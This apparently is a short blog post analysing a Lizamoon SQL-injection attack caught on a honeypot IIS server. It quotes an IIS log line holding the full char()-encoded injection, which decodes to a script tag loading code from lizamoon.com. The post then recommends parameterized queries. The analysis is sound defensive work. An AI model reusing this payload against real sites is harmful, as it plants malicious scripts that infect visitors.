The past 10 days has seen a big increase in Lizamoon activity. Stories about Lizamoon have reported anything from a few thousand site being attacked to 1.5 million. Some of the sites attacked have been high profile.
So, what does Lizamoon really do?
I created a honeypot site with a windows 2003 server running IIS. The site was attacked via an http GET statement targeted at a webpage that had a non validated SQL query. The database had a note field injected with a string of text. This is a line from the IIS log:-
2011-03-29 12:17:02 192.168.0.25 GET /sub-folder/page.asp rec_id=3251681+update+table_1+set+field_1=REPLACE(cast(field_1+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))–|49|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. – 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) – - www.domain.co.uk 500 2709 1017 9921
You can see that the attack was initiated from 95.64.9.18 and instructed the underlying SQL server to replace the contents of field_1 in table_1 with a string of text.
The SQL statement was crafted to block the rest of the statement from running by disguising as a comment i.e. –
This style of attack can be mitigated by parameterized statements and type checking
Loading tweets...
Recent Comments